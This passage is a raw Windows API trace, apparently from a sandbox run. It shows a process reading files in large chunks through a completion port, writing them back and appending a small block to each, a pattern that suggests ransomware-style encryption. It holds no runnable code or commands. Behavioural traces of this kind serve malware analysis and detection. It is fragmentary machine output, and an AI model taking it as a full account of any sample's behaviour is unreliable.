PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.328] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.329] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3510020) returned 0x0 [0156.329] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.329] ReadFile (in: hFile=0x1e0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3630020) returned 0x0 [0156.329] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0156.329] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.329] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.329] ReadFile (in: hFile=0x1d8, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3750020) returned 0x0 [0156.329] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.329] WriteFile (in: hFile=0x194, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0156.348] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.348] WriteFile (in: hFile=0x1e0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3630020) returned 1 [0156.355] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.355] WriteFile (in: hFile=0x1bc, lpBuffer=0x3ab0124*, nNumberOfBytesToWrite=0x10697, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3ab0020) returned 1 [0156.372] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0156.373] CloseHandle (hObject=0x1d8) returned 1 [0156.381] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0156.383] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.431] WriteFile (in: hFile=0x1b8, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x37e0020) returned 1 [0159.435] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.435] WriteFile (in: hFile=0x1c0, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3480020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.439] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.439] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.439] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.439] CloseHandle (hObject=0x1c0) returned 1 [0159.446] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0159.449] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.449] CloseHandle (hObject=0x1a0) returned 1 [0159.461] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0159.463] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.463] CloseHandle (hObject=0x1e0) returned 1 [0159.484] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3a20020) returned 1 [0159.486] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.592] ReadFile (in: hFile=0x1c, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2690020) returned 1 [0159.593] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.593] WriteFile (in: hFile=0x1c, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x16afd, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020) returned 1 [0159.593] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.593] ReadFile (in: hFile=0x1c, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.593] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.593] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.594] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.594] WriteFile (in: hFile=0x1c, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2690020) returned 1 [0159.594] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.594] CloseHandle (hObject=0x1c) returned 1 [0159.595] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.610] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.658] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 1 [0159.659] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.659] WriteFile (in: hFile=0x1d0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xb438, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.659] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.659] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.659] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.660] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.660] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.660] WriteFile (in: hFile=0x1d0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.660] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.660] CloseHandle (hObject=0x1d0) returned 1 [0159.663] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.664] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.716] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 1 [0159.716] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.716] WriteFile (in: hFile=0x1d0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x14918, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.717] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.717] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.717] WriteFile (in: hFile=0x1d0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.717] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.717] CloseHandle (hObject=0x1d0) returned 1 [0159.721] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.721] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.851] ReadFile (in: hFile=0x1c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 1 [0159.893] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.893] ReadFile (in: hFile=0x1e0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2b70020) returned 1 [0159.893] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.893] ReadFile (in: hFile=0x1ac, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3510020) returned 1 [0159.894] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.894] WriteFile (in: hFile=0x1c, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x97f6, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.894] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.894] WriteFile (in: hFile=0x1e0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x55ab, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020) returned 1 [0159.894] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.894] WriteFile (in: hFile=0x1ac, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x103ed, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3510020) returned 1 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.895] ReadFile (in: hFile=0x1c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.895] ReadFile (in: hFile=0x1e0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.895] ReadFile (in: hFile=0x1ac, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x2fef7c8*=0x0, lpOverlapped=0x3510020) returned 0x0 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.895] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.895] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 0 [0159.895] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0159.895] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.895] WriteFile (in: hFile=0x1c, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x710020) returned 1 [0159.896] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.896] WriteFile (in: hFile=0x1e0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x2b70020) returned 1 [0159.896] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fef7c8, lpCompletionKey=0x2fef7c4, lpOverlapped=0x2fef7cc) returned 1 [0159.896] WriteFile (in: hFile=0x1ac, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x2fef7c8, lpOverlapped=0x3510020) returned 1 [0159.896] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2fef7c8, 